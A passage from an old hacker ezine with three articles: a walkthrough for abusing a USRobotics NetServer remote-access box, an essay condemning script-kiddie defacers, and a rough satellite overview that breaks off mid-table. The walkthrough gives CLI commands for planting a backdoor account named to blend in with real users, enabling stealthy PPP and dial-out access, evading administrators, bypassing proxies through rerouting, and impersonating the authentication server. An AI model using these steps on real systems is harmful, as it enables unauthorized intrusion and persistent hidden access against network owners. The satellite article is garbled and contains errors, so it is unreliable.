123.111.164.230/C 1 3468 eth:1
......
session:list ip arp<enter>

IP ARP
IP Address Phys Address Type IfName
123.111.164.001 00:87:3i:28:24:40 Dynamic eth:1
123.111.164.179 00:27:ah:01:4f:60 Dynamic eth:1
......
session:list ip interface_block<enter>

IP INTERFACE BLOCKS

Address Neighbor Status Interface
000.000.000.000/H 123.111.164.231 ENABLED mod:1
123.111.164.230/C 000.000.000.000 ENABLED eth:1
......
session:list ip networks<enter>

CONFIGURED NETWORKS
Name Prot Int State Type Network Address
ip IP eth:1 ENA STAT 123.111.164.230/C
IP-loopback IP loopback ENA AUTO 127.0.0.1/A
2608159-ip-I3 IP mod:1 ENA DYN 123.111.164.231/H
......
session:list ip routes<enter>

IP ROUTES
Destination Prot NextHop Metric Interface
000.000.000.000/0 NetMgr 166.079.164.001 1 eth:1
127.000.000.000/A LOCAL 127.000.000.001 1 loopback
127.000.000.001/H LOCAL 127.000.000.001 1 loopback
127.255.255.255/H LOCAL 127.255.255.255 1 loopback
123.111.164.000/C LOCAL 123.111.164.230 1 eth:1
123.111.164.230/H LOCAL 123.111.164.230 1 eth:1
123.111.164.231/H LOCAL 123.111.164.231 1 mod:1
123.111.164.255/H LOCAL 123.111.164.255 1 eth:1
255.255.255.255/H LOCAL 255.255.255.255 1 eth:1
......
session:list tcp connections<enter>

TCP CONNECTIONS
Local Address Local Port Remote Address Remote Port Status
000.000.000.000 23 000.000.000.000 0 Listen
000.000.000.000 139 000.000.000.000 0 Listen
000.000.000.000 5000 000.000.000.000 0 Listen
......
session:list tftp clients<enter>

TFTP CLIENT ADDRESSES
123.111.162.15
......
session:list udp listeners<enter>

UDP LISTENERS
Local Address Port
000.000.000.000 69
000.000.000.000 161
000.000.000.000 520
000.000.000.000 1645
000.000.000.000 2049
000.000.000.000 2050
000.000.000.000 3000
......

To get a complete system configuration use the <show config> command:

session:show configuration<enter>
CONFIGURATION SETTINGS

System Identification:
Name: RAS_Sam Contact: hybrid

Authentication Remote: ENABLED Local: ENABLED
Primary Server: 123.111.162.159 Secondary Server: 000.000.000.000

Remote Accounting: ENABLED
Primary Server: 123.111.162.159 Secondary Server: 000.000.000.000

Interfaces:
eth:1
loopback
mod:1 mod:2 mod:3
mod:4 mod:5 mod:6
mod:7 mod:8

IP Forwarding: ENABLED Routing: ENABLED RIP: ENABLED
Dynamic Pool Beginning Address: 123.111.164.231 Size: 8
Networks:
ip ETHERNET_II eth:1 123.111.164.230/C
IP-loopback LOOPBACK loopback127.0.0.1/A

IPX Default Gateway: 00000000 Maximum Hops: 15
Dynamic Pool Beginning Address: 00000000 Members: 0

Appletalk ARAP: ON Maximum ARAP Sessions: 8

PPP Receive Authentication: PAP

DNS Domain: uber.coffee.co.uk
Servers:
1 123.111.200.11
...........
session:show dns<enter>

DNS SETTINGS
Domain Name: uber.coffee.co.uk
Number Retries per Server: 1
Timeout Period in Seconds: 5
...........

Now thats enough information you will need about the netserver for the time
being. There are also a wealth of other commands concerning to listing of
IP configurations, but those are the more important ones, the next set of
commands list and show information about the netservers files/architecture
setup.

-------
session:list files<enter>
Appletalk.cfg
CLI.cfg
CallInitProcess.cfg
ConfigProcess.cfg
DNS.cfg } the DNS configuration
DialOutProcess.cfg
EventHandler.cfg you can view the contents of a file by
FilterMgr.cfg using the <show file [file]> command,
IPForwarder.cfg this will only show the contents of a
IpxProcess.cfg file if it is in raw ascii.
PilgrimStrings.ind
PilgrimStrings.str
PppProcess.cfg
QuickSetup.cfg
Robo.stats
RoboExecNMProcess.cfg
RoboString.ind
RoboString.str
SnmpProcess.cfg
TermProt.cfg
TftpProcess.cfg
aaa
log-file.local
ns816.bin.z
old-log-file.local
user_settings.cfg
userindex
users
wall_1
...........

OK, now I'm sure you are feed up with reading what commands the netserver has
it's time to take a look at what it can do, and _how_ you can do it. To begin
with you need you're own account, not just any account though, you need an
account that will blend in with the others. Now here is the intersting part,
when you configure an account, you can specify a set IP for the user you add,
you can then (using your own box and DNS server) set up your own sub-domains,
but the cool thing is.. you can configure this all on the netserver.

The netserver has some very advanced options when setting up accounts, you
can specify that you're IP statistics/routing etc are cloaked and even
spoofed (internally) If you are configuring an account on a net connected
netserver, you will be online, and not even exist. (you are behind a multi-
layer firewall, and you're IP is non-existant)

First things first, its a good idea to get a listing of the current users on
the network so we can make an account that will blend in with the others, and
not stick out to much. For this, use the <list users> command.
----------
session:list users<enter>
USERS
Login Network
User Name Service Service Status Type
admin TELNET (D) PPP (D) ACTIVE LOGIN
MANAGE
shitface TELNET (D) PPP INACTIVE NETWORK
default TELNET PPP INACTIVE NETWORK
1233333 TELNET PPP INACTIVE NETWORK
1207706 TELNET PPP INACTIVE NETWORK
1304708 TELNET PPP INACTIVE NETWORK
........

As you can see the higher ratio of users have a numerical username, therefore
when it comes to configuring our own account, we will have a numerical user-
name aswell -- common sense really. Did you notice that the user 'shitface'
had a PPP dialin connection before? (show connections).. Well the user
shitface will have the correct IP/network configurations in order to
establish a PPP connection. So we need to get more information on the user
shitface. User the command <show user [username]>

session:show user shitface<enter>

INFORMATION FOR USER: shitface
Status: INACTIVE
Type: NETWORK
Expiration: 00- -0000
Message:
Callback Type: NORMAL
Phone Number: 1-800-SCAN-4IT
Alternate Phone Number: 1-800-OPERATOR
Input Filter:
Output Filter:
Modem Group: all
Session Timeout 0
Idle Timeout: 0
PARAMETERS FOR NETWORK USERS:
Network Service PPP
Header Compression: TCPIP (D)
MTU: 1500
Send Password:
Appletalk: ENABLED (D)
Appletalk Address Range: 0 - 0
Filter Zones ENABLED (D)
IP Usage: ENABLED
Address Selection: ASSIGN
Remote IP Address: 0.0.0.0/H (D)
IP Routing: NONE
Default Route Option: DISABLED
IP RIP Routing Protocol: RIPV1
IP RIP Routing Policies:
SEND_DEFAULT
SEND_ROUTES
SEND_SUBNETS
ACCEPT_DEFAULT
SILENT
SPLIT_HORIZON
POISON_REVERSE
FLASH_UPDATE
SEND_COMPAT
RIPV1_RECEIVE
RIPV2_RECEIVE
IP RIP Authentication Key:
IPX Usage: ENABLED (D)
IPX Address: 0
IPX Routing: RESPOND (D)
IPX WAN Usage: DISABLED (D)
Spoofing: ENABLED
PARAMETERS for NETWORK PPP USERS
Max Channels 1 (D)
Channel Decrement Percent: 20 (D)
Channel Expansion Percent: 60 (D)
Expansion Algorithm: LINEAR (D)
Receive ACC Map: 0 (D)
Transmit ACC Map: 0 (D)
Compression Algorithm: AUTO (D)
Compression Reset Mode: AUTO (D)
Min Compression Size: 256 (D)
...........

Now we are going to configure an account for ourselves -- this is nessasary
so we can establish a good PPP connection and blend in with the other users
on the network, we can then implement the tools on our own box for mapping
the internal network, or the darkcyde of the firewall, we can then find all
the other connected boxes on the network.

So, when we configure our network account we need to consider the following,
IP usuage, routing, DNS servers, cloaking, spoofing, _stealth_. On a net
connected netserver you can often use your own specified dns server, but
the network traffic in the arp tables etc will reveal abnormal network
activity to a nosey administrator. The best thing to do is use the servers
internal DNS server, you can later own the DNS server aswell :> Also, if the
network is firewalled (which will always be the case) Extrenal use of a DNS
server would arouse susspisions of the administrator(s).

The default settings for PPP access on netservers is standard PPP protocol,
sometimes the administrator would have enabled CHAP or PAP for login
authentification, and this will usually be authentificated by another box on
the network, therefore you are pretty screwed unless you a) own the
authentification server or b) setup your account for standard PPP login
authentification. -- the only disadvantage with this would be that the
account you created would stick out from the others a little more.

Right, time to make the account. In this case, because the majourity of
account names in the user list are numerical we will create a numerical
account, yep you guessed it, we will create an account called '31337'...

---------------
session:add user....
CLI - Missing Required Argument(s):
This field is a User Name
The expected format is an ASCII string. } options
The maximum size is 32 characters
This name must be unique.
...............
ENABLED NETWORK_SERVICE TYPE
LOGIN_SERVICE PASSWORD

You can specify what kind of service you are going to add for yourself, just
keep it to PPP and telnet for the time being, thats what the other users
have, so thats what we'll have. Differnet options for type of service
include:

CALLBACK
DIAL_OUT
LOGIN
MANAGE
NETWORK
The types CALLBACK and DIAL_OUT are mutually exclusive.

So now we are ready to add our user.. The command line is as follows:
-------
session:add user <31337> login_service telnet password <password>
-------

Now to check to see if the user 31337 was addded ok, check the user list..
with the <list users> command
.....
31337 TELNET PPP (D) INACTIVE NETWORK(D)
.....

Right, we got the username there, now we have to activate our capabilitys on
the network. For this we use the <set> command.

session:set user 31337
CLI - Missing Required Argument(s):

This field is a KEYWORD. The possible values are:
ALTERNATE_PHONE_NUMBER MESSAGE SESSION_TIMEOUT
CALLBACK_TYPE MODEM_GROUP TYPE
EXPIRATION OUTPUT_FILTER
IDLE_TIMEOUT PASSWORD
INPUT_FILTER PHONE_NUMBER } If you are super el8
you can add a phone
number in your userfile.

Now, this is optional, and not advisable, but if you want to set your own
IP address (good for subnetting) you can configure your account as follows,
I think I have also done this so you're IP activitys are not loged in the
arp cache.
.......
session:add framed_route user 31337 ip_route (numerical IP address goes here)
.......

We also need to enable the user, the command should be somthing like this:

session:set user 31337 type network
session:set user 31337 type telnet
session:set user 31337 type ppp
session:set user 31337 type login
.......

Now, we have our user setup it's time to test it out. Log out of the system
<exit> reset modems, then dial back in. this time login as 31337 with your
chossen password, which by the way for some reason has to be the same length
as the user account name. Once loged in you should get an automatic PPP
connection.. enable you're PPP client with the internal specified DNS server
default routes etc, and there you go.

Test the DNS server by pinging/telneting whatever to a few host[names] You
now have a secure PPP connection to your host (the USRobotics NetServer) You
can now begin to take a look at what is on the internal network, It is
preferable to use a port mapper such as nmap or similar, you will be
supprised at the boxes you will find connected to the network, as in most
internal networks you will find SunOS/Solaris boxes, UNIX boxes (the
netserver is based on unix -- but i forgot to mention that) you will also
find cisco routers/switches, jet-directs, printers, everything you would
expect to find on an internal LAN network.

Now we've established out net connection, its time to take a look at the
further things you can do with the netserver system. If the network has a
nice amount of modems in the modem serial pool (you can see this in the
show commands) we can configure our account for dialout aswell. This can be
done by using the <set user> commands. The best thig to do here is set up a
seperate account fro dialout only, therefore if the admin notices that
account you wont loose your access alltogether. Once you have set up your
seperate account with login_user and dial_out settings, you can then telnet
back to the netserver (IP obtained via scan --- or the command show system)
Once telneted back to the netserver you can login with your dialout account
user name, and then attach to the modem pool an control the modems just as
you would in a terminal screen, AT etc. You can then dialout whilst you are
similtaniously online aswell.

As in most OSs, the netserver system operates on a multi-user security access
level basis. There are differnet levels of access for example,

admin --- super-user
manager --- manager
user123 --- standard user
guest --- guest access
default --- default settings

To look at this in more detail, here are the settings for the admin account
and also the settings for the default accounts:

--------
session:show user admin<enter>

INFORMATION FOR USER: admin
Status: ACTIVE
Type: LOGIN
MANAGE
Expiration: 00- -0000
Message:
Callback Type: NORMAL
Phone Number:
Alternate Phone Number:
Input Filter:
Output Filter:
Modem Group: all (D)
Session Timeout 0
Idle Timeout: 0
PARAMETERS FOR LOGIN USERS:
Login Service: TELNET (D)
TCP Port: 23 (D)
Terminal: vt100 (D)
Login Host: 000.000.000.000
Host Type: SELECT
.......
session:show user default<enter>

INFORMATION FOR USER: default
Status: INACTIVE
Type: NETWORK
Expiration: 00- -0000
Message:
Callback Type: NORMAL
Phone Number:
Alternate Phone Number:
Input Filter:
Output Filter:
Modem Group: all
Session Timeout 0
Idle Timeout: 0
PARAMETERS FOR NETWORK USERS:
Network Service PPP
Header Compression: TCPIP
MTU: 1514
Send Password:
Appletalk: ENABLED
Appletalk Address Range: 0 - 0
Filter Zones ENABLED
IP Usage: ENABLED
Address Selection: ASSIGN
Remote IP Address: 0.0.0.0/H
IP Routing: NONE
Default Route Option: DISABLED
IP RIP Routing Protocol: RIPV1
IP RIP Routing Policies:
IP RIP Authentication Key:
IPX Usage: ENABLED
IPX Address: 0
IPX Routing: RESPOND
IPX WAN Usage: DISABLED
Spoofing: DISABLED
PARAMETERS for NETWORK PPP USERS
Max Channels 1
Channel Decrement Percent: 20
Channel Expansion Percent: 60
Expansion Algorithm: LINEAR
Receive ACC Map: 0
Transmit ACC Map: 0
Compression Algorithm: AUTO
Compression Reset Mode: AUTO
Min Compression Size: 256
........

You can also see what is going on on the netserver at the time you are on it
bye issueing the following command:

----------
session:list processes<enter>

PROCESSES
Index Name Type Status
2001 NameManager System Inactive
12001 Console System Inactive
22001 FileManager System Inactive
32001 Configurator Application Inactive
42001 Main Application Active
52001 MIB Registrar Application Inactive
62001 Config File Manager Application Inactive
72001 IP Forwarder Forwarder Inactive
82001 UDP Process Application Inactive
92001 TCP Process Application Inactive
a2001 Telnet Application Inactive
b2001 SLIP Process Application Inactive
c2001 TFTP Process c2001 Application Inactive
d2001 IP Spoofing Application Inactive
e2001 Proxy NetBIOS Application Inactive
f2001 RoboExec NetManagement Application Active
102001 User Manager Application Inactive
112001 SNMP Agent Application Inactive
122001 Event Handler Application Inactive
132001 Point to Point Protocol Application Inactive
142001 Domain Name System Application Inactive
152001 Filter Manager Process Application Inactive
162001 IPX Forwarder Inactive
172001 IPX RIP Application Inactive
182001 SAP Application Inactive
192001 IPX DIAG Application Inactive
1a2001 IPX NETBIOS Application Inactive
1b2001 IPX SPOOF Application Inactive
1c2001 IPX WAN Application Inactive
1d2001 AppleTalk Forwarder Forwarder Inactive
1e2001 AppleTalk NBP/ZIP Application Inactive
1f2001 AppleTalk Spoofer Application Inactive
202001 AppleTalk RTMP Application Inactive
212001 AppleTalk ARAP Framing Application Inactive
222001 IPX/IP Dial-out Process Application Inactive
232001 File System Compaction ProcessApplication Inactive
242001 Console Driver Driver Inactive
252001 Loopback Driver Driver Inactive
262001 Ethernet Driver Driver Inactive
272001 Modem Port Driver Driver Inactive
282001 Call Init Process Application Inactive
292001 IP Routing Instance Application Inactive
2a2001 CLI Application Inactive
2b2004 CLI 2b2004 Application Inactive
-------------

The commands on the shell interface are fairly self explanitory and all
offer a limited amount of info in help topics. It appears that on some
netservers, where server authentification is enabled, if an account is set
up, the username and login details are automaticaly transfered to the
authentification server, so any other box on that network connected to the
authentification server will allow you to login with the username you set
up on the netserver, nice big security hole for the admins to ponder over.

There are a few obsticles that you may have to overcome if you find such a
server, exapmple: most netservers are hidden nicley behind firewalls, aswell
as outgoing packets are sent through proxy servers. Again, you have options
here, you could a) attempt to get admin on the proxy servers and the
routers, or b) -- the more favourable option would be to re-configure your
IP routing in the network setup configuration on the netserver. This means
you would bypass any proxy/security servers that are present on that network.

An idea I had a while back when dealing with authentification servers is to
find the the local authentification server on the network, and mirror the
software/OS etc that the authentification server uses. Lets say the
authentification server was 123.111.33.6.. (After you have replicated the
server) -- first temporarily take the server offline in the ip routing
configuration, then configure a user account with the fixed IP of
123.111.33.6 (the authentification server).. login as that user when you are
on the box you set up with the authentification software, the idea is that
all authentification packets will be sent to your box, effectivly making you
(the host) the authentification server. It's just an idea anyhow, I've never
tried it out, but I'm sure somthing like that would work.

Anyhow, thats it for this article, I hope you enjoyed it. Take it easy and
remeber to visit my website :) --- hybrid.


--- http://hybrid.dtmf.org ---

___ ___ _____.___.____________________ ____________
hybrid@dtmf.org / | \\__ | |\______ \______ \/_ \______ \
hybrid@ninex.com / ~ \/ | | | | _/| _/ | || | \
hybrid@phunc.com \ Y /\____ | | | \| | \ | || ` \
---------------- \___|_ / / ______| |______ /|____|_ / |___/_______ /
\/ \/ \/ \/ \/

shouts fly out to: [ D4RKCYDE ] [ B4B0 ] [ 9X ] [ PHUNC ] [ DTMF ] [ MED ]
[ zomba ] [ downtime ] [ jasun ] [ substance ] [ tip ]
[ gb ] [ ph1x ] [ jorge ] [ lowtek ] [ wirepair ]
[ psyclone ] [ oeb ] [ siezer ] [ infidel ] [ knight ]

+++
NO CARRIER


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use
Comment: I Encrypt, Therefore I Am

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
=f9ac
-----END PGP PUBLIC KEY BLOCK-----


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Disgust
  
En-Mass ]::[OO--[ by shiloh ]---[ shiloh@hurontario.net ]::
-->[OO]:::::::::::::::::::::::::::::::::::::::::::[ http://i.am/shiloh ]:::::


Disgust En-Mass.
by shiloh - June 28, 1999

It wasn't that long ago that I was a starry-eyed kid, who followed the scene
blindly. But it also wasn't that long ago that so-called hackers had morals,
of a kind. There was an unspoken collective agreement that hacking actually
stood for something worth-while. Somehow the term hacking has been seamlessly
forever misdefined by all the cracker/fraudulent kiddies out there. What
ever happened to the freedom of information? What ever happened to the
righteousness behind a good hack? Somehow young pre-teens have grown up on
exploits and power-trips. Somehow the latest crack has been given the title
of a "hack" and we all spread the word.

But that's not what hacking is and never has been. Years ago I remember
sitting in a backwards channel on a not-so-recommended corner of IRC arguing
over the definition of a hacker.

hacker (n.) 1. one who works as an individual or as part of a team to gain
access to information otherwise not available to the public, under the belief
that all information is and should be public knowledge. 2. one who works as
an individual or as part of a team to bring forward into the public eye the
flaws and loopholes present in current so-called secure systems.

When we happened on that one, there was still some semblance of truth to it.
There were still those we could point out who worked under the guidelines of
such statements, rather than for the simple purpose of being able to "0wn" a
system and then leave their mark, possibly destroying pertinent data in the
process.

With the new millennium rapidly descending upon us, and the possibility of
the end of the world, most wanna-be hackers are just out for a name for
themselves. They want their alias flashed across the web, they want their
faces in the news. They like the idea of a stack of newspaper clippings with
THEIR alias in it, because they would only agree to be quoted if "their
identity remains unknown".

These so-called hackers are simply mislabeled. They're not hackers. They're
something that no one really wants to relate to, but deep inside knows they
are. These script-kiddies, who steal other people's work and use it to crack
into a system, are simply one thing collectively: criminals.

"... a California consulting firm, Computer Economics Inc., issued a report
June 18 that estimated business losses of $7.6 billion to virus and 'worm'
attacks in the first half of this year alone. " (Taken from the on-line The I
nquirer, an article Sunday June 27, 99 -
http://www.phillynews.com/inquirer/99/Jun/27/front_page/HACK27.htm

There is no end to the amount of damage caused by these people working in the
name of hacking. They easily slip into systems, through glaring flaws in the
security, and then wreck havoc. The worst part is? They're proud of it.
They're 14, 15, 16 years old for the most part and they brag to their friends
about it. Common-place today is what is best known as Web-hacking, where an
individual or group will enter a system and re-write www/html files to put
their name on the web. Normally such edited files will include nasty
threats, proclamations of superiority, shout-outs to friends, disturbing
graphics and if we - the viewing audience - are lucky, there will also be a
group logo, such as the Keebler Elves 0wned icon.

It's criminal. What is the betterment to anyone by this? Sure, the site
goes off-line, the administrators spend time and money checking into their
security, and the police/FBI make a half-hearted effort at tracking down the
vandals. It's an electronic form of tagging. That's all it is. WWW pages
are just another form of large down-town brick buildings eager for a coat of
spray-paint.

I suppose what gets to me the most - the real clincher is - rarely do these
kids get in by their own devices. It's usually some exploit they picked up
from slashdot or bugtraq, written by maybe even a friend of theirs, but not
them, and put to use after multiple testings of on-line IRC unfortunates. In
all honesty, I'm not computer illiterate and am capable of running an
executable file on my *nix machine. It wouldn't be so hard for me to crack
into any number of severely crippled security-wise web pages and maybe even
post this article. It's something I've written and put my own effort into -
why shouldn't I plaster is all over the web for the world to read? Maybe
because there's a little bit of morality in me. I wouldn't break into my
next-door neighbor's house and leave it on their kitchen table for them to
read, or wallpaper their house with it. I wouldn't break into the Police
Station's file room and put one in every case folder for someone to happen
upon later. Why should I break into a company web site and plaster their
page with my words, why should I attempt to 0wn an FBI site for the sole
purpose of making a name for myself?

When speaking with a long-time security consultant who has experience from
the at-home aspect, on up into corporate Motorola and then back down to the
level of local ISP, he shared a few words of wisdom "What you should do, as a
hacker, is leave a file, maybe something called iwashere.txt - because then
it's 8 characters and works in all platforms, including the out-dated DOS
ones - with something to the effect that you broke into their system, have
looked around, that they're not going to be able to track you, but you want
them to know that you were here and then sign it with your on-line alias.
After you do this to a number of sites, you're going to get the fame you
want, and the sites are going to go about securing themselves just as they
would if you'd edited their web page. It's probably still illegal, but you
haven't caused any REAL damage."

Over the years the term "hacking" has become one related closely to computer/
phone-crimes and credit-card fraud. The previously given definition has
little chance of ever standing true again and those of us who remember the
"old-school" days sit back silently and watch the youngsters quickly bury
themselves in a world they just don't understand. Anarchy has yet to find a
solid ground in our society and when one tries to live outside the walls of
the norm, but insists on leaving trails inside, there's only one place to end
up.


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ ACTS-Satelites ]:::::::[OO--[ by lowtek ]--[ lowtek@l0wtek.org ]:::
-->[OO]:::::::::::::::::::::::::::::::[ http://deadprotocol.org/lowtek ]:::::


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|The World of the Advanced Communications Technology Satellite... |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ACTS-Operations and structure
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
written by lowtek
lowtek@deadprotocol.org
lowtek@l0tek.org



********************************************
Advanced Communications Technology Satellite
********************************************

The ACTS satellite network was depelopted and schedualed for launch on
Febuary 3, 1993 It is located in the Ka band at around 18-31 ghz and is in
geosynchronous orbit aka the clark belt (22,300 miles above earth.) The ACTS
satellite has many features that are not yet avalible to the public satellite
market and shall continue to lead major satellite research towards it. This
satellite was a result of the research done by many military and government
operations that wanted to work on specific satellite projects to lead the
public satellite verndors. They work on specific projects such as mobilie
terminals, ATM linking via satellite, SOnet, and many other large network
communications useage.


-=-=-=-=-=-==-=-=
Features of ACTS:
-=-=-=-=-=-=-=-=-


.o 110-Mbps time division Multiple Access


.o Digital regeneration and Switching on board the satellite


.o Multi Beam Anteana's


.o BaseBand Processor



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
There are currently many earth station
developments going on in means of the
ACTS satellite such as the following:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


-=-=-=-=-=-=-=-=-
| The ACTS T1 VSAT|
-=-=-=-=-=-=-=-=-

Is basically The main earth Station that provides means with communicating
with the satellite and most of its functions on board.

-=-=-=-=-=-=-=-=-=-=-=-=-
| The ACTS Mobile Terminal|
-=-=-=-=-=-=-=-=-=-=-=-=-

Is away of achieving the goal of making tremendous speeds of satellite data
well on the road and making it easier to communicate world wide. This earth
station will be put into use with things such as International Hostpitals and
also Telemedicine, Quality Audio, Military, Secure Communications and Many
Aeronautical Applications such as Jets, Missiles and other aero mobile units.

-=-=-=-=-=-=-=-=-=-=-=-=-=-
|The Aeronaticaul Experiment|
-=-=-=-=-=-=-=-=-=-=-=-=-=-

This Station is similar to the Mobile Station in that it is on the run but
in a different platform of the word run. Here we are talking about in the
midst of soaring 5000 miles high and transmitting a signal to the satellite
for navigation, radar, enemy persuit.

-=-=-=-=-=-
|ACTS MASCOM|
-=-=-=-=-=-

Is a Station that would let you manipulate the steering of a vehical in
persue this was tested at Fort Leavenworth with a Hummer to test the
Electronic Steering.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|Broad Band Aeronatical Terminal|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

The Broad Band terminal allows the satellite to upink many things at the same
time such as 2 conversations on the telephone and compressed 2 way video also
full resolution of Television to the air craft.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|INTEX Ka Band Experimental Satellite Ground Terminal|
-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

This station is mainly one to help out with all of ACTS other experiments it
provides measurement of various signal quality on the satellite link quality.
Also is used to evaluate data compresion and Compares digital modulation and
coding data.


-=-=-=-
|HBR/LET|
-==-=-=

High Burst Rate Link Evaluation Terminal is used as a safty device to watch
over the ACTS satellite's performace of the microwave switch matrix mode.
This Terminal has statistics about the satellites rain fade and measured
quality of all links.


-=-=-=-=-=-=-===-=-=-=-=-=-
Well there are more in the
proccess being made as I
speak so look forward for
an update...
-=-=-=-=-=-=-=-=-=-=-=-=-=-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Why the Ka band?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

You may be asking, "why in the world is this satellite operating in the Ka
Band?" Well ACTS is the first satellite to actually transmit in the Ka band
and because of this people have to watch the weather 24/7 in little rooms so
they know when to notify the military if it will have bad signaling from the
rain... The reason it is placed around the Ka band is because it has a 2.4
spectrum avalible. This is is 5 times fater than at lower frequncey bands
such as where LEOS orbit around 400 to 1000 miles above earth.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Spectrums Analysis and Explenation
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


This section explians the Spectrum a little more than I have done at the top
so hang with me. The word "Spectrum" refers to a range of radio freqs that
are used, or a portion of radio waves to make phone calls or transmit certain
data. A freqency is the number of times each second that each radio wave
completes a cycle. There are many Spectrums that are broken up into bands by
the FCC. For example: Cordless phones are assigned to the 46 and 49 million
cycle (hertz) per second. A "hertz" refers to one cycle of a radio wave.

The higher the frequency, the more precious it is and this is why the Ka
band at 30/20 ghz is a little more precious and is checked for weather hourly
I have included the following weather analysys off NASA's server to show an
example:

-----------------------------------\ |-|
| \ | |
| USA \/ |
| |
| |
| |
| |
| |
| \ \
-----------------------------------------\ \
\_\ <-------- Bad Weather
Quickly The NOC Is
Notified and The ACTS
Satellite sits and
waits for the weather
to pass

The data is straight from the BBP of the satellite which transmits the data
to the NASA Glen Research Center Mater Control Center VAX where it is kept on
record for future research.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

MASTER CONTROL STATION ALARMS
(Alarm Severity: I-Info., S-Status, E-Error, W-Warning, F-Fatal)
